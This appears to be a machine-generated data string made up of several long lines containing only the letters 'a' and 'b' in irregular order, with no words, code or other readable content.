babaabaaaabbabaaaaababbaaabbabaabbabbaaaaaaaabbabbabaaaabaaabaababababbaababaaabaababababababbbbababbabbaababbbabbbbbbbaaaaaaaabbbbbbabaabbabbabbbaaaabbbbbaaaababbbaabbabbbaabbbabaabbabbbababbaabaaabbbbbbaababbaabbaabaabaaaaababaabbabaaaabbabaababbababaababaabbbabbbabbabbbbbaabbbababababaaaabbabaaaaaaabbbabababbaababaaabbbaaaaababbaaaababbbaaabababaaabaabbbbbbaaaabaaabbbbbbbbbababaabaabbbabaaaabbbbbbabaabbbaaaababbaabaababbbaabbaaaabbbaabbbbabbabbbaabbababbaaababaaabbaaababababbabbbbbbbbabaabbbbabaabbaabbaaaabbbabaabbbbaabbababbbbbabbabaaaaaabbbbbaaabbabaababbaabababbaaaaaaaabababbbbbbbababbabaaaabaababaabaabbbbaaabbbababaabaabbaaabbabbbbababaaababbbbaababbbbabbbabaababaababaabbabbabababbbabbbabbbaabaabbbabbbbbbbaabbbbbaaabaababaabaaabaaabaaaabaaaaabbaaaaaaababbbbababbaabbbbabababbaaaaaabaaaabbbbaaaabaaaabbabaaabbaaaababaaabbbbabababaabbaaabbabbaaabbaabbbbaaababbabbbbbbabbbbaabaabaaabbabbaaaaabbabaabbbbbbaaabbababbaaaabbaaabaabbababbbbaaababbbbababaaaabbabbaabaababbaaaabbbbababaaaaaabbaaaabaaaabbabbaaababaabbabbaaabbbbbbbbbaaabbaababbaababbaababaaabbbabbbaababababbabaabbababaaabbbbaabbabbbaaabbbababaaaabbabbbaababaabbbbbababbbbaabaaabababaabbbaaabbababbaaaabbaabbbabbaabbbbbaabaaaabaaababbabbbbaabaabaabaabbaabaaaaabbbabbbbaaaabbaabbbbaaaaabbbbaabbabbbabbbbabbabababbaaabbbaaaababbaababbbaabaaaabbabbabaaaaaaabaaababaabbaabaaaaaababbbbbbaabbaaabbbbaabbabaaabbbbababaaaaaabbbbbaabaaabaaaababbbbbbbabbbaaabbabababaabbaabbbbaaaabaaaababbbabbbbabaababaaabbbaababbaaabaabbbaabaaaabbbabaabaababbaabbbaaabaaaaaaaabbbaabaabbbabbbbbbbaaaababbbabbaababbbaabbbabaabaaabbaaaaaaababbaaaabaababbbabbaabbbbaaabaaabaaabababbaababaabbaaabbababbabbbabaabbaabaaaaaabbabbbbbbaabbbbabbabbabaabaaabaaabbabbbaaabbbabaaaabaaabaabbaaaababbaababbaaabaaaabbababaaaaaaaabaabbbbbbabbaabaaabbaaabbbabbabbbbababaaabaaabbbabbaabbbabaaaabbaabaabaaaababaaabaaabbaababbabaababaabbbbaabbbbabaabababbbbbaabbbaababbabbbabbbaabbbabbabaaabbbaabaaababbbbaaaaabaabaaababbbbbabaabaaaabbaaaaabbabbaabbaaaaabbbabaaabaaababbaabaabbabbbbaaabbaabbbabbbbabaabbaaabbabaaabaababbabbaabbbbaabbbbabbbaababbbbaabbbbbbbbbbbaaaabababbaabbbababaaabaaababbaababaabaaaaaaabababaabbbabbabbbbabaabbaaaabaabbababbbbbabbbaabaabbbbabaaabaaaaaabbbabbbaabbaaaaababaaabababbabbaaabbbaabbbabbaabaababaabbbbbababbbbbaaabaabaaaabbabaabaabbbbaabbaaabbaababbababaabababaabbbbbbabaabaababbaaabbbbababaabaaabbabaabaaaaaaaaabaabbaabbaaabbabbbbaabbbabbaababaabbaaabaabaababaabababbbbabbbabbbbabaaabababbababaaaaaababbbaabbbabaaabababbbbbabaaababaaaabaaaabbabbaaaababbbaabaabbaaabbbbbabaabababbaabbbbbaabbbbabaabbaaabaababbabababaaabbbbbaaaaaaaabbaaaabaaaabbbbaaabbabaabaabbaaabbaaaabaabaaababaaababaaaabbaabababbabbababbaabaabbabbaababbabbbaababaaaaababaaabaabaabbbabbaaaabbaabbababbaaaabaababbbbaababbbbbabaaaabaabaaabbaaabababbabbaaaaabbaabaaabbaaaaababbaaaababbaabaaaaaaabababbbbaaaaabaabbabaaaabaaaaabbbbabaabbaabbaabababbaaabaaababbabbbaabbbbabbabaabaaaaaabbbabaabbbbbaaaaaababbaabbaaaaabaaaabbaabaaabaabaabaababaaaaaababaaabbbbbbbaabaabbaababbabbaabbbaaabbabbbabbaaaaabbbaaabaabaabbbbabbaabaaaaaaabbaabbbbbabbbabaabbbaabbabbbbbbaabbbaaabbbabbbababaaabaababababbaaaababbbaaaaaaabbbabbaaabbabbabbbbaabbabbababbbaaaaaabbbbbbabbaabaabaaaaabaabaabbbbbbabaababbbbaabbabbbbaabaaababbbabaabbbababbbbaabbaaaaaabbbabbaabbbababbbbbaabaabbaaaabbabaaaaaaaabbbbabbbbbbbbbbaaaababbbbbaaaabbbaaababaababaabbababaaaabbaababbbbaababbbaaaaabbbbbaabbbabaabaaabbabbbaabbabbaaaaabbaaaaaabaababbbaabaaaaabbbabaababbaababbbabbaaabbbbabaabaabbaaabababbbbabbbbabaaabbaabbbabbabbabababaabaaaaabbabbabababaaaabbbabbaaabbbababaaaaaaaaba
abababbababbbaaaabbabaaaaabbbbaabbaaaabaabbaababaabaaabbaaabbababaababbaaaaaaababaaaabaabbbbababbaaaaaaabaabaaaaaabbaaabbbaabaaaaaabbababaababbbbaabaabbbabbababbbaabbabbabbabbabbbaaabaabaababbbaabbbaababbaaabaabbabbbbaaaabbbabbbaababaababbbbbbabbabbababababbabbbababaababbbabaabababbabbbbbabbababbbbabaabaaabbaababbbaabbaaabaabbbbbaabbaabbbbabbabababbababaabaaaaababbbaaabbabbabbbabbabbaabaaabbaabbaababbbababaaabababaabaaaababbabbabbaaabaababbabaabbababbbaabaababbabaabaaabbbbabbabaaaabbbaabaabbbbabaababbaaabbbaaabbabbbbaabaaaaabababbbabbababbbababbabaaabbaabaabbbaaaaaababbaabbaabbabaabbabaaabaaabbabbbabbbaabbaabbbbaaabbbabaababbbbbbaaababaabbabbababbbbabbababbbbbbabaabbaaaaababbabaaaaabbaaaabaaabbbababaababbbbaaaabbabbaabbaabbaabbbaaababbbbbbaababaaabbaaaabbaabaaabaaababbbaabbbaaabbabaababaabbabbababaababaababaaaaaabbaaaababbbbbbabbaabaabbbabbabbabbbaaaababbaabbabaaaaabbbbabbbaaabababababbaaaabbabaabbabbbaaabbbbababbaaaabbabbbbbbbaaaabaaabababaaababaabbababaaabbbaaaaaaaaabbbabaabbaaaaaaaaabbbabaababaabababbbbabaababbabbbaaabbbbaaabaabaababaaaaabbbbbbbabaaabbaabbbbbabbaabbaabbaabbabaaaaaabbbbbbaababaabbabaabaababbaaababbaabababbbbabaaaabbbbaabbbabaaabaaababbaabbbaabbaabbaabbabbbababbabaaababaaabaaababaaaabbbbaabaaababaabbbaaabababbabbabbbbaabbaaabbbbababaabbaaaababbbbbabbabbbbbabbbbabaababbaaabbabaaabbabaabbbbaabbabbbbbabababababbaaaabbaabbbaabbabaabbabaaabbbabbababaabaababbabbaabaaabbaaaaaabaaabbbbbaaababbbabbaabbbbababbbaabbbaaaaaabbbbaabbababbbababbbabbbbaabbbbbbaabbbbababbaabaabbaaaaaabbbaabaaabbbbbbbbaabbbbaaabbbabaababbaabaababbbaaabababbaaaaaabbabbaaaabbbabaabaaabaabbaabbababbbbbbbaabbaaababaaaabbabbbbbbaaababaaabaabababaabbaaabbbaabbaababbabbabbbabbaabaabbbbbaaababbaaabbbaabababbabababaaabaaabaaaaabaabbaaabbabaabbbbaabbbabaaaaabaaabaaabaabbabbabaabbbabaabbaaaabbbbbaababbbbabbabbbbbaababbabababababbabababaabbaaaaabbabaaaababbbaaababababbbbbaabbbbaaaaabbbbabbbbbababaabbbabbbbabaaababbbbbabababbaaabaabbaaaaaaabbbbbbbabbbbababababbbbabbaababbabaaababbbababaaaabbbbbaabbaabbabaaabbbabbbabbaaabababaabaaabbabaaaaaaaabbabbababaaabbbaaaabbbbababbaaaababbbbababbbababbbababaababbaababaaababbabbbaaabaabaaabbabbbbbbbabbaabbbbabbaabbabaababaaaabbbabaaaababbbbbabbaaaabaabaaababaabaaabbaaaabbaabbaaaababababaabaabbaaaaababbabaabbbbaabaaabbabaabbbbbbbababbaaabbaaaaaabbbbbabbabbbaabbabaabbbabbabaaaaabbbbbbbabaaabaaababbaabbbbbaaabbaaaaaabbaabbabaaaabbabbbababababbaaaabababbaaababbaabbaabbabababbababbbbaababbbaababbababbabaaabbbbaaababbaabbbbbbbaababbbbabbbbabbabaababbbbaaaaaabbabbbbabaaaabbaababbaaaababbaaaabbbbbaaaababbaabababbabaaabaaabbbaaababbbabaaaaabaabbbbaaaaaabbbaaababaaaabbaaabbababaabababbababbabbaababbabaabbabbabbababbaaabbaabbbbbaabbabbabbabaabbbbbbbabaabaaababaaaaaabaababbaabbbbaaaaaabbbbbaaababaaaaabbbbbaabaabaaaaaaabbababbbabbbabbbabaabbbbabbbbbbbbaaaaababaaaabbbaaabaaabaaabbaaabbbbabbbbbbbaabbabbbbaababbaaaaabaaaaaaaababbbbababbbabbabaabbbbabbbabaabaaaaabbabababbaaaabbbaaaaaaaaaabaaabaabaaaabbbbbabaabbbaabbbaabbbbbbbaaaabbaaaaabbbbabbaababaaabbbaaaaababbbaabaabaaaaaaababaababababbabbababbbbabababaabaababbaabbaaababbbbbabaaabbbabbbabbaaaaaabaabbaaaaabaabbbbbbabaaaaabbbbaabbbaabbababaaaaabbaababbbbbbbbbabbabbabaabbababbababbaabbaabbaaaabaabbabaabaabbbbabbbbbbaabaabbbababaaabbabbbaababaaaabaaaaaaabababbbaabaaabaaaaaaababaaaaaabbaaabbabababbabaababaaaababaaabbbbaaabbbaaabaabababbaaabbaaaabbbbbbaaabbaaaababbabbbbaabbbbabbbbabbabbabaabaaabbabbbbbaaaababababbbaaabbbaaabbbbaaaabbbabbbaabaaaabbbbaaabaabbababbbabbabbbabbbbaaaaaabbaabbabbbbbaaabaababaabbbaaaaabaabaabaaaaaabbbbabbabaabbabbbaabababaaaba
bbaaaabbaaaaabababbbbbbaaaabababbbababbabaabbbabbaabaaaaaabbabbbaaababbbbbbaabbbaabaabbaaaababbabbabbbabbbbaababababababababbbaaaaabababbbaabaaababbbabbaaaabaabbbbaaababbaabbaaabbbbabbaababbbbaaaabbbbabaabaabbaabbbbaaaababaaaaabbbbbababbbaabaabbbbaababbaaabbbaababbbbaaaabbbababbaabbbbbbabbbbaaabaabbbbabbbaabbbaaababbbabbabbbbbbbaabaaabbbabaabbbbbaaaaabaababaaabbaaaabbaaaaaabaaabaabbabbaabbaaaababbbabbbababbabbabbaabbbabaaaabbaabbbaabbabbaaaabbbaababbabbbbaabbbababbbbbbbaabaaabbbababbbabaaabbbbbbbbababbbbbbababbbbbbabbbbbaababbbbbbbabbabbaaababbbababbabbabaaabbbaabaababaabbababbbabbaaabbaabbabbabbbaaababbaabbaabbbbbababbaabbaaabaababaaabbbabaababbbbbbbbbbabaabbbbaababababbbaabbbabaabaabbaaaabaaaaaabbabbbabaabaaababbaababbbbbbbbbabbbabaaaaabababbbaaabaaabaabbaaaaababaaaababbaaaaaaaababbbbabbabaabaaaabbaaaaaababaabbbaaabbababbbbaababababababaababaabbbabbabaaabaaabbbbbbaaabaaabbbbbbaababaabbaaababbaaaababbaaabbbaaaaaabababbabaaabaaabbbbabaaaaaaaaabbaaaabbabbabaababaaaaababbbbaaaaaaaaaabbabbaaaabbbaaaaaabbabbbbaaaaaabbaabbbabbababbbaaaaaaaaabaaabababbabaabbaaaabababbbbbbbaaaabbabaaababbbbabaaaaaabbababbbababbbbbababbbaaababaabbbbaaabbbabaababbabbaaabbbbbbaabbbababbbabaababbbbaababbaaaaaaabaaabbbaabbaabbabbabbababbbbaaaababbbababababbaabbaabababaaabaabbbaaaabababababaaaabaaabbaaababbababbbbbabbbabaabbababaaaabaaaaaabaabbababababbabbabbababaabbbabababaabbbabaaabbbabaababaaaaaabbaaabaababbaaabbaababbbaabbbabbbbaaababaaabbbbbaabbaaaaaaabbabbabbababaababaaababbababbbbabaabaabaaaababaaaaabaaabbabbbaaababbbabbabababaaabbbabaaabaabaaababbbabaaabbaabaaaabaabaabbababbaaabaabaabaaababaaabbabbaaababaaabbabbaaabbabbabaaabaabbbbbbabbaaabaabaaabbbbababababbbabbaabaabbaaabaabababbbaaabbabaabaaaababbbaaabbabbbbaabbabbaabbabbbaabbaaabbbaabbbbaaabaabbabaaaababababbabababbbabaaaaabbbbbabaaaaabbbbbbabbbababbaaabbbaabbaaaaabaaaabbaabbabbbbabbaaabaaababaababaababbbababaabbbabbabbbaaabbbabbbaabaaabbaabbbaabbabbbabaabaaaaaaaabbbaabbbabbbabbbbababbbaabbbbabbbbbababaabbabbaabaabbababbbaabbabbbbaabbbabbabaaaababaaabaabababbaabbbaabaaababbaababababbabbaaaaaaaaaabaabbbabbabbaaaababbbababbabbbbbbabaaabbbababaabbbabbabaaaabababbbaaabaaaaabbaabbaabbaabbaabbabbbbbaabaabbabbaabaabaababaabaaabbabbaabbbbbaabbbbbbaabbbbaababbaabbbaaaabaabaabbbabaaababaaaaaabbaaababbaaababaaabbbaaaaaaaababbabbaaaababbbaaaaaababaabbaaabbbabbababbababaaaaabbbabababbaaaaaabbbabbbbabbbbbbbaabbbbbbbbaabbaaaabaabaabbaaabbabbaabbababaaaaaaabbaabbaabbabaabbbbaaaaaabbbbabbabbbbabbaabaaaabaaaababbaaaababaaabbabababaabaabbaaababbbbbaabbaaabbbbbbbbbababababaaaabababbbaaaabaabaaabbbaabababaaaabaabbbbbbaaaabababbaababbabaaabaabaababaababaaaabababbabbabbbababbbaabbaabbaabbabbbbbbaabaabaaaaaabaabbabababaaaabbbbbaaaaaaaabbaababaabaaabaabaaaababaabbbabaabbabbbabbbabbaaabbaababbaabbaabaabbababaabbbababbabbabbabbaababaaaabbbbbabaaaaaaaaaaabaabaabbabaababaaaaaaaabaaaabbbbbbbabababbbbaaabaaabbbbbbbbbaaaabbbaababababbbabbbabbababaabaabbbbabbbababababbbabaaabababbbaaabaabbbaababbaaabbbbababbabbbabbbaabbabbabaaaabaaabbaaabbabbabbbbaaaabbabbbbabbabbbbababbaaabbbbabbbbbaaaabbabbbaabbbababababaabbbabbbaaabaaaaaaabbaaaabababababbbbabbbaabaabbbbabbbbbabababbabbabbbbbbbbbbaaababbbabbbbbabbaaababaaabababaaaaaabbbbaabbbabbabbaababbaaaabababbbbaababababaabbbaabaabaaababbabbaabaabaabaaaaaabaababaaabaaaababaababaaabbaaabababbbaaaaaaaaabbaabaabbaaaababbabbbabbbabababbaabbabababababbbabbaaaabbaaabaabbbbaabbaaabbaaabbaaaabaabaaabaabbabbbbbbaaaaabbbbaaaabaaabbababaabbaabbaababbabaaabaaaabbbbaaaabbabbbbaabbbbababbbbbaabaaaaaaababbaabbabbaabaaababbbaaaabbaaabaabbbaababbaababbbbaabababaaababb
aabaaaababbbbbbbabaabbbbaabbbbabbbabbaabbabaaababbaabbaabbabbaaaaabbbabaaababbaaaaabaabbabbbbbabbbbabbbabbabbbabaabbaaabaaabbabaaabbbababbbbaababbbbbbaabbbbbbbabaabbabbbaabaaabaaaaaabbbbbaabbaaabbaaabaaababbbaaaabbabaabaabbababbabbbbbaabaababaaaabaaababbbbbbabbabbbaaaaabbabbbabbbbbbbbabaaaabbbaaaaaababbbaababbbbabaabaaabbaaabbabbaabbaaaaabaabaabbbbbbbabbbabbaababbbbaaababbbbaabaaababbaabaababbababaabaabaaabbbaaaabaabbabaabbbaaabaabbaabababaabaabaabbbababbabbbbababbbaabbbaabbbaaababbabbbaabaabbaabababaabbbbaabbbaaaaabbbbbaaababbabaaaabaabaaaabbaaababbababbaabbabbabbaaabaabbaabababbbaaaaaaaabaabaaaaaabaababbbbbbbabbbabbaaaabaaaabbabaabaaaabbababaababbbaabbabaabbababbbbbbbbabbbbbbbababaabaaababbbabbabbbabbbbabaabbaaabbaaabbabaabaaaaabbaabbbbbbbabbbabbabaaababbabaaaaabaaaaaababaaaaaaaabbaabbabbaabaaabbbbabbababbbbbaabbababaabaabbbabaababababaaabbaaababbaaaabaaaaabbbabbbbaaaabbababbaaaaabaabbbbabbabbababaaabaaaabbbbbaabaaaababaaaaaaaabaabbaaaababaaaabbaaaaaababbbbbbaaaabbabbaabaabbabbaaaaababbbabbabaaabaaaaabbabbabaaabbabbbabbaaaabbaaabbbbbabaabbaaaaaabaaabaabbbabbaabbbabbaaaabbaababbbbbbabbabbaabbbbbaaaaaaabbaaaaabababbbabbbbaabaabbaaabababbbaaaabbbaaaabaaaabaaaaababaabbabbaabaababababbbaabababbababbaabababaababbabbabbabbbaaaabaababbbbaabbaaaabaabbaabbbbabbaabaaaababbbbaaababbbbaaaabbaabbaababababbababababbbaaaaabaabababbbbbbbabbbaaabbaaaabaabbbaaabaaaaabaabbaaababaaaaaabbabbbabbabbbaabaabbaabbbaaabaaaabbbbababaabbbbaabaaaaaabbbbaaaaabaaaabaabbaaababbbbbbabbbabbaabbbbabbbaaababababbbaaabaaaabbbbaabbbbbbaabbbabbbbbababbbbabbbaaabababaaababbbaaabbbabbaaababaaaaabaababaabbbbbbbaababbbabaaabbaabbbbabaaabaababbbbaaaaabaaabaabbababbabaabbbaabbbabbaaabbbabbbbbabbaaabaaabaabbbaaabbbabbbaaabaabbbbaabaabababbbabbbabababbababbbaaabaabaaaabbaabaaaaababaaaababaabbabbbaababababaaabaabaaaabaaabbabaabaaabbaaaaabbbbabbbabbaaaabbabbbabbbaabbbbbbaaaaaabbaaaabaaabababbaaaabaabbababaaaaabbbaaaaabbaabbbbaabaabaabaabbaaaababbaaabbaaaabbbbbababbaaabbababaabbabaaaaababbbbaabababaabababbbabbabbbaabaabaabbaaabbabababbaaaabbabaabbbaabbbbbaaababbbaabbaaabaababbbbbbabbabbbaabbbabaaabaabbaabaabbbaabaababaabbbaaaabbaaabbababbbabaabbaabbaabaabbbababaaaabbbbaaaaaaabaabababaababbbbabbababbbbabababaabababbaabbbbbaaaaabbaaabababbaabbbbaaababaaaabbbbabbababbabbbababbbbbbaaaaabbaabaaaaaabbbaaaaaaabaaabaabbaabbbbbaaabbbababbaabaababaabbabbbaabbabbabaabbbaababbbbaaaabbbabbbbababbbbabbabbbbaaaaaaaaabaaabbbaaaaabbbaabaabbaaabaababaabababaabababbbbbbaabaaaabbaabbbabbaababbabbbbaababbbaabababbbabaaaaaababbbabaaaababbbaabbabaababaaaabbbababbaaaaababaabaaabbbbbabbaababbbbbabaabbbbaaaaaabbababbbbbbabbabaaaabbaabbaaaaabaaabaaabbbbbaabbababbabbbabbabbbabbbaaababaaabaaaabaabaabbbaabaaabbaabbbbaabbbbaabbbaaaabaabbbaababababaaabababbbaabaaabbaaaaababbbabbbbaabababbabbbbaabbaabaabbababbaaaabbabbaabbbbbaaabbaabaabbaaabababbbbbbaababbbbaaaabbbaaaabaaabaabaababbaabbaaaababaaaaabaaaabababaaaabbbabaabbbababbbbbabbabbbbabbabbabaaabbbbbbaabbaaaaabbabbbbabbbaabaababaababaabbaabbaaaababaaaababbbabbababaabbabaabaabbbabbaaabbabbbbbbbaabaaaabbbbabbbabbbbaaaaababaaaaaabbababbbaaabbababaabbbabaababaabaabbabaaaaaabbaababaaababababbbbbaaabbbbbaabbbbbbabbaaaabbabbababaabbbbbaabaabaaaaaabbaabaaaaaaabbbaaabbabaaabbbabbbaabbaabbaaabaabbbabbbabaaababaabaaaaababaabbbbaabaabbaabaabbabaaabbababababbabaaaababbaaabbabbaabbaaabaaaaabaaabaaaabaaaabaabbaabaaabbaaabbbaababaaaabbaabbaaababbbaaabaabaabaabbababbaaaaababaaaababaabababbaababbbaaaaaaaaaaababbaabbbabaabaaaaaabaaaabababbbababbaaabbbbaaababbbbaaabbabbaaabbabbabaaabababbaabbabbbaaabbbbbaabbbbbbabaaabbaaababbaabbbabbaabb
bbbaabbbbaabbbabbabbabbabaabaabbaababbabbaabbbbaabbbabaababaabaababaaababbbbababbabaaabbbbbbbabaabbbbbabaaaaaaaaaaabaaaabbbaabbabaabaabbbaaababaaaaabaabaabbbabbabbabbaabaaababbbabaabababababbabbbababaaaabbbbbabbbbbaaabbbbbbbabbabbaabbababbbaabaababaaabaaaabbbabababababababbaababababbbbaaabbbaaabbbbabbabbaaaaabaabaabbaabaaabaabbbbaabaaaabaabbaabbbbbaaaabbbbabaaaabbabaaabbaaababbbbbaabbaabbabbabbabaaaabaaaaabbbaababbaaababaaabaababaabbbabababababbbabababaaaabaaababbbbabababababaabbabbabbaabbbaabbbbbbbaaabaaabbbabbbaaaaababbabababaabbaababababaaaabbabbaaabbabaaabbbababbbbbbababbbbabababbababbbbaabbaabaabaabababbbbbbaaabbaaababababbaaaaaaaabbbaabaaaabbbabbaaaabbbabbbabbabbabbabbaabbbbbbbaaaaababbaabaaaaabaabaabbbbaaaaabaaaabaabbbbbbaabaaaababbabaaaabbabbababaaaaaabbabaabbbbabbaaaaabbaabbaabaaabaabaabbbbaaabbaababaaaaaaabaaabbbbbabaababbabaabaababaaaaaabbbaabbaabbabbaabbbaababaabaaaaaabbaabbababbabbbabbbabbbbabbabababaaababbaaaaababaabbaabaabbbbaaaaabaabaabbbaaaabbbbaaababaabaababbabbbbbaaaaabbabaabaabaaabbbaababbabaabaaaababbababbbababbbbabbbbbabbbabbbbbbbbbababbbaaaaaabaaababaaaaaaabaaabbbabbbababbabbbabbaaaaaaababbaaabbabbaabbbbbbababaabbbabbbbbababaaaaaaabbabbbbabaaabaaababbbbaaaaabaabbbaabaabbbaabaababaabaabaaabbabbababaabbbbaaaababbabbabbbbaaababbbaaaabbbababbbabbabaabaaabbabbbabbaaaabbaaabbbbabaababbaaabbbaaabaaabbababaaabaabaaabaabaaaaaababaaabbbaabbbbabaabaaababbaababbbaaabaabaaaabbaaabbbbbaaaaaabaaaabaababbbbaaaaababaaaaabaabbaaaabaababbaabbaabbbabababbaaaaaaabaabbaabaabaaabaabaaabaababbabbaabbaabaaaabaaababbabbabaabababbababaaabbaaaaaabbbabaaaabaabaaaabbabbaaaaaaabbbbbbabaaabababababbbabababaabaabaaaababaaaaaaababaaababbbbbbbabbbaaabaaabbabababbbbbaababaababbabaaabaababaaababaabababbbbaabaabbbbbbbabbaaabbaaababaaaabbbbabbaabbbbabaabbaabbbabaabbababaaabbabaaaabaaababbbbabbabbabababaaaaabbbbaaabaaabaabbbbbaabbbbaaaabbabbbabbbbaaaabbbabababaababbbbababaaabbbaaabaabbbbababababababbaaababbbbaaaaaaabbbbaaabbbbbbaaaabbaabbbbbaaaaaabbbbaabbaaabaaaaabbbbbbbbabababbaababbbbaaababaaabaaabbaababababaaabbbaabbbaaaabaaabbbaaaabbaababaaaabbbaaaaaaaaababbbabaababbbaabbabbabaaaaaababbbbbbaaabbbababaabababaabbbabaabaaaaabbbbaababbabbabaabbababaaabbabbbbaabbaaabbaaababaaabaaabbaaaaabbbbbaaabbabbbbabbbaaaaaaaabbbaababaaaabaaaaaabbbaababababababbbbaaabaabaabbaabbabaaabaabbbaabaaabbbbbbbbbbbaaaabbbbbbbbbbbbaabaaababaabababaabbbaaaabaaaaabbabbbaaabbbbbaaabaabaaabaabbaababababbabababaaaaaabbbabbaabaabbaaabaabbbababababbbbbbaabbbbaaabaababbaaabbbbbaababaabaaabbbbbabbabaabaabaabaabbabaabbaabbaaabbbbabbbbbabbabbbbbbaaaababbaababbbbabaaabaabaaabbbabbaaabbaaaababbbaabbaabaaaaabababbabbabbabaabbabbabbabbbbaaaaabbbababbbbaabbaaaabaaaaaabbbabaaabaaaabbbbaabbbaaababbabbbabbabababbbaaaaabbbbbaaabaabbaababbababaabaaabbaaaabbaaabbaaabbaabbbbbbababbabbbbbbbaabbbabbbabbbbbbbbbabbabbbabbbbbbbbbabbbbbaaabaabaaabbaabbabbbbbbbabbaaabbabaaabbbbbbbbbbbbbbabbaabbbaaaababaaaaaaabaabbbbabbbbbbbbbbaabababababbbbabbbbabbaaabaabbaaaaabbaaababbbaaaaaabbaaababbababaababbbabababbabbbabaaaaaaabaaabbbabababaabbabaaaabbbbbbaaaababaabbbbaabbaaaaaabaaabbaaaabaaaaabaaaabbbabababbabaaababbbaaaabbaaaabbababbaabaabbaababbababbababbbabaababbbaaaabbbbaabbbabbabaaaaaaaaaaaabababaaaabaaaaababbbbabbbbabaabaabbbbbbabbbaabaabbbabaaaaabbabbaabbbaaaabbbbaaaabbabbaabbaabaaabbbbbabbaababbaabaabababaaabbabbaabaaaaaaababbaabaaaabbaabbabbbaaaababaaaababbaabbbaaaabbbaaabaaabbbbbbabaabbbaaababababbbbbbabbabbbaaaaababbbaabaaaabababbbaaaabaaaabbabaaaaaababaabaabaaabaabaabbaaaaaabaaaababbbbbbbabbababaabaababaaaabbaabaabbaabbaaaaaabaababbaaaaaaababbbbabaabbbbaaabbb
aabbbbaababbbaabaaababbbabababaabaaabbabbabbbabababbabbbaabaaaaaabaabaaaaaaaabbaaaabaaaabaabbaababbabaaabababbbaaaaaaaababaabaabaaabaaaabaaaaaabbbbbaaaaaababbabbbabbbaabbbaaaaababaabbbbaaababbaabaababaababaaabababaaaaabbbababbbbabbbabbabababbbbbababbaabbbbabbaabbbbabaababbabbbabbbbbbbaabababbbbabbbbaaababbbbbbbbaaaababaabaabbaabbabaabaaabaababaabbbabbbaaaabababbbaaabababbababbaababbbabaababaaabbbaaabbbbabbbabbaaababababbaaaaaababbaaabbbaabbabaabaaaabbabbbabbaaabbbaaabbbbbabbaabaabaabbbaaabaabbbbbaababbbbabbbbabaaaaabaabbbbbabbaababaabbbbbbbbbabaaaaabaabaabababbbababbabbbaabaaabaaabababaaababaaaabbbbbabbbbabbbababbabbabbaaaabbbbaababaabbaaaaababbbbabbbaabaabaabaababbbaaabaaabbbbbbbaabbabbbbbbbabbbbbbaaababaabbbabbbbababbaaabaabaaabbababbbbabbababbabbaababbbbbbbbaabaabbbbaababbaaaaababaaaaababababaabbbaabaabbabaaabaaaabaaaaabababababbababababbbbbbbaaabbbbbbbbaaaaabaaaaaaabbbbaaaabbbababaaababbababbbabababbababaabbaaababbbabbbbabbaaaaabaabaababaaaabbbabbbbabaaaaaaabbbaabbabbbbbbaabbaabaabbaabbaaaabbabbaabbbabbaaaaaaaaabbbbaaababbbaaaabbaabaaaabbabbabbbaabbbbbabababaaabbabaabbaabbbbaaaaaaaaababababbbabbaaabaabababababbbaabaaabaaaabaaabaaaabbbbbbbbbababaaaababbbbbababaaabbbabbbabbaabaaabaabbbbabbbbbbaaaabbaaaaababbaabaaaaaababbbbbabbaaaaabbbabbaababaaaaaabbababbabbbbaabbbbbbabaaaabababbaaabbbababababaabaaaaaababaaaababaaabaaabaaaaababaaabbabbbaabbabaabbabbbababbababbaaababbbbbaabbbabababbabbabbaabbaabaaaabbaaaabbaabaabbbbbabbababaaaabaabbabaabbaaaababbaaabbbbbbbababababbabbabbbbbababbbbbbaabbaabaabbababbbbabaaabbbaabbabbaabaabababbababababbaaaaaaaaaabbabaabaabbaabaaabbbaaaabbbbbaaabbaabaaababaabbabaaaababbabbaababaaabaaabbbabaabaabbbabbabaaaaabbaabaaaaabbaabbaababababbaabaaaaaabaaabbabaaaabbbabaabbabbaabbbaaabbbaaaababaaabbabbabaaaabaaabbaabbbaaaaabbababaabbbbaaabbbbbbaabbabbbbbabababbabbaaabaabbabbbabaaaaaaaaabababbabbabaaaaaabbaaaabbbbaaabbbbaaabbabaaababbaaabbaaabbbbaaabbbbbbbabaaabbbbaaababbaabaabbbbbabaababbaaaababaababababbaabbbaabbbabbbabababbabbabbbaababbaaaabbabbababbbbaabaaaaaabababbbbababaaabbbbbbbbbabbbbbbaaaabbaabbbbbaabbabaaabababaaabbbbbababbbabaaaaabbaaabaaabbbaababbbbaabababbabbbababaaababbbaaaabaabababbbaabaaaabaabababbaabbbaaabababbbabaabbbabbaabaaabbaabbababbbbababbaaaabaaaaabababaaaabbbabbbbaaabbaaabaaaaabaabbbbbbaaaaabbaaaaaabbbbbbbbaaaaaaabaabbbaababbbbabaaababbabababbbbaabababbbababbaabbbabbaaaabbabaabaabbbbbbabbbabababbbaaaaabbaaaabbabbbaaababbababaabababaabaabaabaaabaaabbaaaabbaaaaaababbabbababababbaababaaababbabbbabaabbbbabbaabaabababbbbabaabaaaabbaaaaaaaaabbbabbbbabbbabbabaaabbbabababbbabbbbbaabbabbabbbaababbaaaaaabaabbabaabaaaabbbababbbbaaaaaababaabaaaabbababbaaaaabbbaaaaaaabababbaaabaaabaababaaaababbaaabbbabaaaabbbbabbababbabbbababbbbaaaaaaabbbabbabaaaaababbaababaaabbaababbabbbaabbababbbabbaabbbbbabaaabaabbabbbaabbbbbabababaaaaabaabbabababbbbaababaaababaababbbbbabababbabaababaabaabbbabaabbbaabbabbbabbababaaaaabbbaaaabbbbabaaabaabaabbbaababbabbbbaaaabbbaaaabaaabbaabbbbbabbbababbbaaaabababaaaababbbbbaabaaaabbbaabbaaabbaabaaaabbbbbaababaabbababaaabbabaaaababbaabaabaaabaabbbaababbbbabbbaabaaaaabbabababaabaaaabbbababbbbabbbbaaaaaaabaaabaabbbbaaaaababbaaabbbbabbbbbabbaaabaaabaabaabaaabbaabbbaabbabaaaabbbaaaabbabaaaaaaaabbbabbbaaaaabbabaaaaabbabbaaabbbabbaabaaaabbaaabbabbbbaaabaabbbbbbbabababababbaaabaabaaabaaabbaaabbaabbabaaabaabbaabbabbbbbbbbaaababbbbabbababbababbbbabbabaabaaaaaaabbbabababbaabbaaabaabbaabbabaaaabaabbaaabaabbbababaaabbbabbabbababbaabbaaababbabaabaabbaababaabaabbaabbbbaaabaaabbabbaaaababababaaaabaababbbbbaabbabbaababbaabbbbaabababbabaabaaaaaaabbaabbabbaaab
